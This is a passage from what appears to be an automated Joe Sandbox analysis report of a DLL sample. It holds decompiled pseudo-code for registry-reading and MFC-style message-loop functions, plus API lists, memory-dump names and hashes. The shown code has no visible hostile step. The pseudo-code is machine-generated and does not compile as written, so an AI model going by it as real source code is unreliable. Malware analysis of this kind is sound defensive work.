                                                                                                                                                                            				intOrPtr _v292;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                            				char _t44;
                                                                                                                                                                            				void* _t47;
                                                                                                                                                                            				void* _t54;
                                                                                                                                                                            				char* _t61;
                                                                                                                                                                            				void* _t77;
                                                                                                                                                                            				void* _t80;
                                                                                                                                                                            				void* _t81;
                                                                                                                                                                            				intOrPtr _t94;
                                                                                                                                                                            				void* _t98;
                                                                                                                                                                            				void* _t100;
                                                                                                                                                                            				void* _t101;
                                                                                                                                                                            				char* _t104;
                                                                                                                                                                            
                                                                                                                                                                            				_t95 = __edx;
                                                                                                                                                                            				_t81 = __ecx;
                                                                                                                                                                            				_t79 = __ebx;
                                                                                                                                                                            				_t104 =  &_v272;
                                                                                                                                                                            				_t40 =  *0x10057a08; // 0xaf9b6515
                                                                                                                                                                            				_a264 = _t40 ^ _t104;
                                                                                                                                                                            				_push(0x18);
                                                                                                                                                                            				E10017BC1(E10027F63, __ebx, __edi, __esi);
                                                                                                                                                                            				_t100 = __ecx;
                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                            				_v32 = 0;
                                                                                                                                                                            				_t44 = E1000BB54(__ecx, __edx);
                                                                                                                                                                            				_v28 = _t44;
                                                                                                                                                                            				if(_t44 != 0) {
                                                                                                                                                                            					do {
                                                                                                                                                                            						__eax =  &_v28;
                                                                                                                                                                            						_push(__eax);
                                                                                                                                                                            						__ecx = __esi;
                                                                                                                                                                            						E1000BB65();
                                                                                                                                                                            						__eflags = __eax - __edi;
                                                                                                                                                                            						if(__eax != __edi) {
                                                                                                                                                                            							__edx =  *__eax;
                                                                                                                                                                            							__ecx = __eax;
                                                                                                                                                                            							__eax =  *((intOrPtr*)(__edx + 0xc))(__edi, 0xfffffffc, __edi, __edi);
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _v28 - __edi;
                                                                                                                                                                            					} while (_v28 != __edi);
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags =  *(_t100 + 0x54);
                                                                                                                                                                            				if( *(_t100 + 0x54) == 0) {
                                                                                                                                                                            					L15:
                                                                                                                                                                            					 *[fs:0x0] = _v12;
                                                                                                                                                                            					_pop(_t98);
                                                                                                                                                                            					_pop(_t101);
                                                                                                                                                                            					_pop(_t80);
                                                                                                                                                                            					_t47 = E100167D5(1, _t80, _a264 ^ _t104, _t95, _t98, _t101);
                                                                                                                                                                            					__eflags =  &_a268;
                                                                                                                                                                            					return _t47;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					__eflags =  *(_t100 + 0x68);
                                                                                                                                                                            					__eflags = 0 |  *(_t100 + 0x68) != 0x00000000;
                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                            						_push("Software\\");
                                                                                                                                                                            						E10009FA3(_t79,  &_v16, 0, _t100, __eflags);
                                                                                                                                                                            						_v4 = 0;
                                                                                                                                                                            						E10009F7E(_t79,  &_v16,  *(_t100 + 0x54));
                                                                                                                                                                            						_push(0x1002a248);
                                                                                                                                                                            						_push( &_v16);
                                                                                                                                                                            						_push( &_v36);
                                                                                                                                                                            						_t54 = E1000BC25(_t79, 0, _t100, __eflags);
                                                                                                                                                                            						_push( *(_t100 + 0x68));
                                                                                                                                                                            						_v4 = 1;
                                                                                                                                                                            						_push(_t54);
                                                                                                                                                                            						_push( &_v24);
                                                                                                                                                                            						E1000BC25(_t79, 0, _t100, __eflags);
                                                                                                                                                                            						_v4 = 3;
                                                                                                                                                                            						E10009CB7(_v36 + 0xfffffff0, _t95);
                                                                                                                                                                            						_push( &_v24);
                                                                                                                                                                            						_push(0x80000001);
                                                                                                                                                                            						E1000BC89(_t79, 0, 0x80000001, __eflags);
                                                                                                                                                                            						_t61 = RegOpenKeyA(0x80000001, _v16,  &_v20);
                                                                                                                                                                            						__eflags = _t61;
                                                                                                                                                                            						if(_t61 == 0) {
                                                                                                                                                                            							__eflags = RegEnumKeyA(_v20, 0, _t104, 0x104) - 0x103;
                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                            								_push( &_v16);
                                                                                                                                                                            								_push(0x80000001);
                                                                                                                                                                            								E1000BC89(_t79, 0, 0x80000001, __eflags);
                                                                                                                                                                            							}
                                                                                                                                                                            							RegCloseKey(_v20);
                                                                                                                                                                            						}
                                                                                                                                                                            						RegQueryValueA(0x80000001, _v24, _t104,  &_v32);
                                                                                                                                                                            						E10009CB7( &(_v24[0xfffffffffffffff0]), _t95);
                                                                                                                                                                            						__eflags =  &(_v16[0xfffffffffffffff0]);
                                                                                                                                                                            						E10009CB7( &(_v16[0xfffffffffffffff0]), _t95);
                                                                                                                                                                            						goto L15;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_push(_t104);
                                                                                                                                                                            						_push(_t81);
                                                                                                                                                                            						_v280 = 0x10057298;
                                                                                                                                                                            						E10017C83( &_v280, 0x1002e2fc);
                                                                                                                                                                            						asm("int3");
                                                                                                                                                                            						_push(4);
                                                                                                                                                                            						E10017BC1(E10027DEC, _t79, 0, _t100);
                                                                                                                                                                            						_t94 = E10013965(0x104);
                                                                                                                                                                            						_v292 = _t94;
                                                                                                                                                                            						_t77 = 0;
                                                                                                                                                                            						_v280 = 0;
                                                                                                                                                                            						if(_t94 != 0) {
                                                                                                                                                                            							_t77 = E1000CF71(_t94);
                                                                                                                                                                            						}
                                                                                                                                                                            						return E10017C60(_t77);
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}




























                                                                                                                                                                            0x1000bd98
                                                                                                                                                                            0x1000bd98
                                                                                                                                                                            0x1000bd98
                                                                                                                                                                            0x1000bd9f
                                                                                                                                                                            0x1000bda3
                                                                                                                                                                            0x1000bdaa
                                                                                                                                                                            0x1000bdb0
                                                                                                                                                                            0x1000bdb7
                                                                                                                                                                            0x1000bdbe
                                                                                                                                                                            0x1000bdc0
                                                                                                                                                                            0x1000bdc3
                                                                                                                                                                            0x1000bdc6
                                                                                                                                                                            0x1000bdcd
                                                                                                                                                                            0x1000bdd0
                                                                                                                                                                            0x1000bdd2
                                                                                                                                                                            0x1000bdd2
                                                                                                                                                                            0x1000bdd5
                                                                                                                                                                            0x1000bdd6
                                                                                                                                                                            0x1000bdd8
                                                                                                                                                                            0x1000bddd
                                                                                                                                                                            0x1000bddf
                                                                                                                                                                            0x1000bde1
                                                                                                                                                                            0x1000bde8
                                                                                                                                                                            0x1000bdea
                                                                                                                                                                            0x1000bdea
                                                                                                                                                                            0x1000bded
                                                                                                                                                                            0x1000bded
                                                                                                                                                                            0x1000bdd2
                                                                                                                                                                            0x1000bdf2
                                                                                                                                                                            0x1000bdf5
                                                                                                                                                                            0x1000bed2
                                                                                                                                                                            0x1000bed8
                                                                                                                                                                            0x1000bee0
                                                                                                                                                                            0x1000bee1
                                                                                                                                                                            0x1000bee2
                                                                                                                                                                            0x1000beeb
                                                                                                                                                                            0x1000bef0
                                                                                                                                                                            0x1000bef7
                                                                                                                                                                            0x1000bdfb
                                                                                                                                                                            0x1000bdfd
                                                                                                                                                                            0x1000be03
                                                                                                                                                                            0x1000be05
                                                                                                                                                                            0x1000be0c
                                                                                                                                                                            0x1000be14
                                                                                                                                                                            0x1000be1f
                                                                                                                                                                            0x1000be22
                                                                                                                                                                            0x1000be27
                                                                                                                                                                            0x1000be2f
                                                                                                                                                                            0x1000be33
                                                                                                                                                                            0x1000be34
                                                                                                                                                                            0x1000be39
                                                                                                                                                                            0x1000be3c
                                                                                                                                                                            0x1000be40
                                                                                                                                                                            0x1000be44
                                                                                                                                                                            0x1000be45
                                                                                                                                                                            0x1000be53
                                                                                                                                                                            0x1000be57
                                                                                                                                                                            0x1000be5f
                                                                                                                                                                            0x1000be65
                                                                                                                                                                            0x1000be66
                                                                                                                                                                            0x1000be73
                                                                                                                                                                            0x1000be79
                                                                                                                                                                            0x1000be7b
                                                                                                                                                                            0x1000be90
                                                                                                                                                                            0x1000be95
                                                                                                                                                                            0x1000be9a
                                                                                                                                                                            0x1000be9b
                                                                                                                                                                            0x1000be9c
                                                                                                                                                                            0x1000be9c
                                                                                                                                                                            0x1000bea4
                                                                                                                                                                            0x1000bea4
                                                                                                                                                                            0x1000beb6
                                                                                                                                                                            0x1000bec2
                                                                                                                                                                            0x1000beca
                                                                                                                                                                            0x1000becd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000be07
                                                                                                                                                                            0x1000a0db
                                                                                                                                                                            0x1000a0de
                                                                                                                                                                            0x1000a0e8
                                                                                                                                                                            0x1000a0ef
                                                                                                                                                                            0x1000a0f4
                                                                                                                                                                            0x1000a0f5
                                                                                                                                                                            0x1000a0fc
                                                                                                                                                                            0x1000a10b
                                                                                                                                                                            0x1000a10d
                                                                                                                                                                            0x1000a110
                                                                                                                                                                            0x1000a114
                                                                                                                                                                            0x1000a117
                                                                                                                                                                            0x1000a119
                                                                                                                                                                            0x1000a119
                                                                                                                                                                            0x1000a123
                                                                                                                                                                            0x1000a123
                                                                                                                                                                            0x1000be05

                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 1000BDB7
                                                                                                                                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1000BE73
                                                                                                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 1000BE8A
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,Software\,00000018), ref: 1000BEA4
                                                                                                                                                                            • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1000BEB6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                                                                                            • String ID: Software\
                                                                                                                                                                            • API String ID: 3878845136-964853688
                                                                                                                                                                            • Opcode ID: 7ebb37ec80ad41570234b5e56baee62c3bc695e135d0d4cdd5ea00e84b8678cd
                                                                                                                                                                            • Instruction ID: bb9b01b2753fba5bda47465ad6778d866e06322e4a0b808ca87f46191af68194
                                                                                                                                                                            • Opcode Fuzzy Hash: 7ebb37ec80ad41570234b5e56baee62c3bc695e135d0d4cdd5ea00e84b8678cd
                                                                                                                                                                            • Instruction Fuzzy Hash: 6241AC31900559AFEB11DFA4CC81EFEB7B9EF48390F20052AF552E2294DB74AA45CB61
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                            			E1000F6F2(intOrPtr* __ecx, signed int _a4) {
                                                                                                                                                                            				struct HWND__* _v4;
                                                                                                                                                                            				struct tagMSG* _v8;
                                                                                                                                                                            				int _v12;
                                                                                                                                                                            				int _v16;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				struct HWND__* _t42;
                                                                                                                                                                            				struct tagMSG* _t43;
                                                                                                                                                                            				signed int _t45;
                                                                                                                                                                            				void* _t48;
                                                                                                                                                                            				void* _t50;
                                                                                                                                                                            				int _t53;
                                                                                                                                                                            				long _t56;
                                                                                                                                                                            				signed int _t62;
                                                                                                                                                                            				intOrPtr* _t64;
                                                                                                                                                                            				intOrPtr* _t67;
                                                                                                                                                                            				void* _t68;
                                                                                                                                                                            
                                                                                                                                                                            				_t63 = __ecx;
                                                                                                                                                                            				_t62 = 1;
                                                                                                                                                                            				_t67 = __ecx;
                                                                                                                                                                            				_v12 = 1;
                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                            				if((_a4 & 0x00000004) == 0 || (E10012862(__ecx) & 0x10000000) != 0) {
                                                                                                                                                                            					_t62 = 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t42 = GetParent( *(_t67 + 0x20));
                                                                                                                                                                            				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
                                                                                                                                                                            				_v4 = _t42;
                                                                                                                                                                            				_t43 = E1000B519(0);
                                                                                                                                                                            				_t68 = UpdateWindow;
                                                                                                                                                                            				_v8 = _t43;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					L14:
                                                                                                                                                                            					_t73 = _v12;
                                                                                                                                                                            					if(_v12 == 0) {
                                                                                                                                                                            						goto L15;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                            						while(1) {
                                                                                                                                                                            							L15:
                                                                                                                                                                            							_t45 = E1000B911(_t63, 0, _t67, _t73);
                                                                                                                                                                            							if(_t45 == 0) {
                                                                                                                                                                            								break;
                                                                                                                                                                            							}
                                                                                                                                                                            							if(_t62 != 0) {
                                                                                                                                                                            								_t53 = _v8->message;
                                                                                                                                                                            								if(_t53 == 0x118 || _t53 == 0x104) {
                                                                                                                                                                            									E100128D7(_t67, 1);
                                                                                                                                                                            									UpdateWindow( *(_t67 + 0x20));
                                                                                                                                                                            									_t62 = 0;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							_t64 = _t67;
                                                                                                                                                                            							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
                                                                                                                                                                            							_t79 = _t48;
                                                                                                                                                                            							if(_t48 == 0) {
                                                                                                                                                                            								_t39 = _t67 + 0x3c;
                                                                                                                                                                            								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
                                                                                                                                                                            								__eflags =  *_t39;
                                                                                                                                                                            								return  *((intOrPtr*)(_t67 + 0x44));
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t50 = E1000B82B(_t62, _t64, 0, _t67, _t68, _t79, _v8);
                                                                                                                                                                            								_pop(_t63);
                                                                                                                                                                            								if(_t50 != 0) {
                                                                                                                                                                            									_v12 = 1;
                                                                                                                                                                            									_v16 = 0;
                                                                                                                                                                            								}
                                                                                                                                                                            								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
                                                                                                                                                                            									continue;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									goto L14;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						_push(0);
                                                                                                                                                                            						E1000A5E4();
                                                                                                                                                                            						return _t45 | 0xffffffff;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t62;
                                                                                                                                                                            					if(_t62 != 0) {
                                                                                                                                                                            						_t63 = _t67;
                                                                                                                                                                            						E100128D7(_t67, 1);
                                                                                                                                                                            						UpdateWindow( *(_t67 + 0x20));
                                                                                                                                                                            						_t62 = 0;
                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _a4 & 0x00000001;
                                                                                                                                                                            					if((_a4 & 0x00000001) == 0) {
                                                                                                                                                                            						__eflags = _v4;
                                                                                                                                                                            						if(_v4 != 0) {
                                                                                                                                                                            							__eflags = _v16;
                                                                                                                                                                            							if(_v16 == 0) {
                                                                                                                                                                            								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _a4 & 0x00000002;
                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                            						L13:
                                                                                                                                                                            						_v12 = 0;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
                                                                                                                                                                            						_v16 = _v16 + 1;
                                                                                                                                                                            						__eflags = _t56;
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L13;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				goto L15;
                                                                                                                                                                            			}






















                                                                                                                                                                            0x1000f6f2
                                                                                                                                                                            0x1000f6fb
                                                                                                                                                                            0x1000f703
                                                                                                                                                                            0x1000f705
                                                                                                                                                                            0x1000f709
                                                                                                                                                                            0x1000f70d
                                                                                                                                                                            0x1000f71b
                                                                                                                                                                            0x1000f71b
                                                                                                                                                                            0x1000f720
                                                                                                                                                                            0x1000f726
                                                                                                                                                                            0x1000f72a
                                                                                                                                                                            0x1000f72e
                                                                                                                                                                            0x1000f733
                                                                                                                                                                            0x1000f739
                                                                                                                                                                            0x1000f7b1
                                                                                                                                                                            0x1000f7b1
                                                                                                                                                                            0x1000f7b1
                                                                                                                                                                            0x1000f7b5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000f74d
                                                                                                                                                                            0x1000f74f
                                                                                                                                                                            0x1000f7b7
                                                                                                                                                                            0x1000f7b7
                                                                                                                                                                            0x1000f7b7
                                                                                                                                                                            0x1000f7be
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000f7c2
                                                                                                                                                                            0x1000f7c8
                                                                                                                                                                            0x1000f7d0
                                                                                                                                                                            0x1000f7dd
                                                                                                                                                                            0x1000f7e5
                                                                                                                                                                            0x1000f7e7
                                                                                                                                                                            0x1000f7e7
                                                                                                                                                                            0x1000f7d0
                                                                                                                                                                            0x1000f7eb
                                                                                                                                                                            0x1000f7ed
                                                                                                                                                                            0x1000f7f3
                                                                                                                                                                            0x1000f7f5
                                                                                                                                                                            0x1000f830
                                                                                                                                                                            0x1000f830
                                                                                                                                                                            0x1000f830
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000f7f7
                                                                                                                                                                            0x1000f7fb
                                                                                                                                                                            0x1000f802
                                                                                                                                                                            0x1000f803
                                                                                                                                                                            0x1000f805
                                                                                                                                                                            0x1000f80d
                                                                                                                                                                            0x1000f80d
                                                                                                                                                                            0x1000f821
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000f823
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000f823
                                                                                                                                                                            0x1000f821
                                                                                                                                                                            0x1000f7f5
                                                                                                                                                                            0x1000f825
                                                                                                                                                                            0x1000f826
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000f82b
                                                                                                                                                                            0x1000f751
                                                                                                                                                                            0x1000f753
                                                                                                                                                                            0x1000f757
                                                                                                                                                                            0x1000f759
                                                                                                                                                                            0x1000f761
                                                                                                                                                                            0x1000f763
                                                                                                                                                                            0x1000f763
                                                                                                                                                                            0x1000f763
                                                                                                                                                                            0x1000f765
                                                                                                                                                                            0x1000f76a
                                                                                                                                                                            0x1000f76c
                                                                                                                                                                            0x1000f770
                                                                                                                                                                            0x1000f772
                                                                                                                                                                            0x1000f776
                                                                                                                                                                            0x1000f785
                                                                                                                                                                            0x1000f785
                                                                                                                                                                            0x1000f776
                                                                                                                                                                            0x1000f770
                                                                                                                                                                            0x1000f78b
                                                                                                                                                                            0x1000f790
                                                                                                                                                                            0x1000f7ad
                                                                                                                                                                            0x1000f7ad
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000f792
                                                                                                                                                                            0x1000f79f
                                                                                                                                                                            0x1000f7a5
                                                                                                                                                                            0x1000f7a9
                                                                                                                                                                            0x1000f7ab
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000f7ab
                                                                                                                                                                            0x1000f790
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetParent.USER32(?), ref: 1000F720
                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000F747
                                                                                                                                                                            • UpdateWindow.USER32(?), ref: 1000F761
                                                                                                                                                                            • SendMessageA.USER32(?,00000121,00000000,?), ref: 1000F785
                                                                                                                                                                            • SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 1000F79F
                                                                                                                                                                            • UpdateWindow.USER32(?), ref: 1000F7E5
                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000F819
                                                                                                                                                                              • Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2853195852-0
                                                                                                                                                                            • Opcode ID: 1a7b99641fbd6274f08d233d62057ee23ad71d0a046cd1d00a2b03b8b2250d72
                                                                                                                                                                            • Instruction ID: ecef1c15dac149fec5e590ec2565d957468d58fa3f8c06f10f68a2e84cd0c50c
                                                                                                                                                                            • Opcode Fuzzy Hash: 1a7b99641fbd6274f08d233d62057ee23ad71d0a046cd1d00a2b03b8b2250d72
                                                                                                                                                                            • Instruction Fuzzy Hash: 3041C1312087429BE711CF258C88A2BBAF4FFC5BD4F10092DF589928A4DB71D946EB53
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                            			E1000AE8A(int __ebx, long __ecx, struct HWND__* __edi) {
                                                                                                                                                                            				long _v4;
                                                                                                                                                                            				char _v28;
                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				long _t20;
                                                                                                                                                                            				long _t21;
                                                                                                                                                                            				struct HWND__* _t22;
                                                                                                                                                                            				long _t23;
                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                            				long _t25;
                                                                                                                                                                            				struct HWND__* _t26;
                                                                                                                                                                            				void* _t33;
                                                                                                                                                                            				void* _t35;
                                                                                                                                                                            				long _t39;
                                                                                                                                                                            				long _t41;
                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                            				struct HWND__* _t47;
                                                                                                                                                                            				struct HWND__* _t49;
                                                                                                                                                                            				long _t51;
                                                                                                                                                                            				long _t53;
                                                                                                                                                                            
                                                                                                                                                                            				_t46 = __edi;
                                                                                                                                                                            				_t39 = __ecx;
                                                                                                                                                                            				_t37 = __ebx;
                                                                                                                                                                            				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
                                                                                                                                                                            					_t51 = E1000A7CE();
                                                                                                                                                                            					__eflags = _t51;
                                                                                                                                                                            					if(_t51 != 0) {
                                                                                                                                                                            						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
                                                                                                                                                                            						__eflags = _t20;
                                                                                                                                                                            						_t41 = _t51;
                                                                                                                                                                            						_pop(_t52);
                                                                                                                                                                            						if(_t20 != 0) {
                                                                                                                                                                            							_t53 = _t41;
                                                                                                                                                                            							_t21 =  *(_t53 + 0x64);
                                                                                                                                                                            							__eflags = _t21;
                                                                                                                                                                            							if(_t21 == 0) {
                                                                                                                                                                            								_pop(_t52);
                                                                                                                                                                            								goto L12;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								__eflags = _t21 - 0x3f107;
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									_t35 = E1000D5EC(__ebx, __edi, _t53, __eflags);
                                                                                                                                                                            									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
                                                                                                                                                                            								}
                                                                                                                                                                            								return _t21;
                                                                                                                                                                            							}
                                                                                                                                                                            						} else {
                                                                                                                                                                            							L12:
                                                                                                                                                                            							_push(_t41);
                                                                                                                                                                            							_push(_t37);
                                                                                                                                                                            							_push(0);
                                                                                                                                                                            							_push(_t52);
                                                                                                                                                                            							_push(_t46);
                                                                                                                                                                            							_v4 = _t41;
                                                                                                                                                                            							_t22 = GetCapture();
                                                                                                                                                                            							_t51 = SendMessageA;
                                                                                                                                                                            							_t37 = 0x365;
                                                                                                                                                                            							while(1) {
                                                                                                                                                                            								_t47 = _t22;
                                                                                                                                                                            								__eflags = _t47;
                                                                                                                                                                            								if(_t47 == 0) {
                                                                                                                                                                            									break;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t23 = SendMessageA(_t47, _t37, 0, 0);
                                                                                                                                                                            								__eflags = _t23;
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									L27:
                                                                                                                                                                            									return _t23;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t22 = E10010DA7(_t41, _t47, __eflags, _t47);
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L33;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t24 = GetFocus();
                                                                                                                                                                            							while(1) {
                                                                                                                                                                            								_t46 = _t24;
                                                                                                                                                                            								__eflags = _t46;
                                                                                                                                                                            								if(_t46 == 0) {
                                                                                                                                                                            									break;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t23 = SendMessageA(_t46, _t37, 0, 0);
                                                                                                                                                                            								__eflags = _t23;
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									goto L27;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t24 = E10010DA7(_t41, _t46, __eflags, _t46);
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L33;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t39 = _v4;
                                                                                                                                                                            							_t25 = E10010DEC(_t37, _t39, _t46);
                                                                                                                                                                            							__eflags = _t25;
                                                                                                                                                                            							if(_t25 != 0) {
                                                                                                                                                                            								_t26 = GetLastActivePopup( *(_t25 + 0x20));
                                                                                                                                                                            								while(1) {
                                                                                                                                                                            									_t49 = _t26;
                                                                                                                                                                            									__eflags = _t49;
                                                                                                                                                                            									_push(0);
                                                                                                                                                                            									if(_t49 == 0) {
                                                                                                                                                                            										break;
                                                                                                                                                                            									}
                                                                                                                                                                            									_t23 = SendMessageA(_t49, _t37, 0, ??);
                                                                                                                                                                            									__eflags = _t23;
                                                                                                                                                                            									if(__eflags == 0) {
                                                                                                                                                                            										_t26 = E10010DA7(_t39, _t49, __eflags, _t49);
                                                                                                                                                                            										continue;
                                                                                                                                                                            									}
                                                                                                                                                                            									goto L27;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
                                                                                                                                                                            								goto L27;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								goto L1;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					} else {
                                                                                                                                                                            						L1:
                                                                                                                                                                            						_push(0);
                                                                                                                                                                            						_push(_t39);
                                                                                                                                                                            						_v28 = 0x10057298;
                                                                                                                                                                            						E10017C83( &_v28, 0x1002e2fc);
                                                                                                                                                                            						asm("int3");
                                                                                                                                                                            						_push(4);
                                                                                                                                                                            						E10017BC1(E10027DEC, _t37, _t46, _t51);
                                                                                                                                                                            						_t43 = E10013965(0x104);
                                                                                                                                                                            						_v40 = _t43;
                                                                                                                                                                            						_t33 = 0;
                                                                                                                                                                            						_v28 = 0;
                                                                                                                                                                            						if(_t43 != 0) {
                                                                                                                                                                            							_t33 = E1000CF71(_t43);
                                                                                                                                                                            						}
                                                                                                                                                                            						return E10017C60(_t33);
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					__eflags = __eax - 0x3f107;
                                                                                                                                                                            					if(__eax != 0x3f107) {
                                                                                                                                                                            						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
                                                                                                                                                                            					}
                                                                                                                                                                            					return __eax;
                                                                                                                                                                            				}
                                                                                                                                                                            				L33:
                                                                                                                                                                            			}
























                                                                                                                                                                            0x1000ae8a
                                                                                                                                                                            0x1000ae8a
                                                                                                                                                                            0x1000ae8a
                                                                                                                                                                            0x1000ae8f
                                                                                                                                                                            0x1000aeaa
                                                                                                                                                                            0x1000aeac
                                                                                                                                                                            0x1000aeae
                                                                                                                                                                            0x1000aeb9
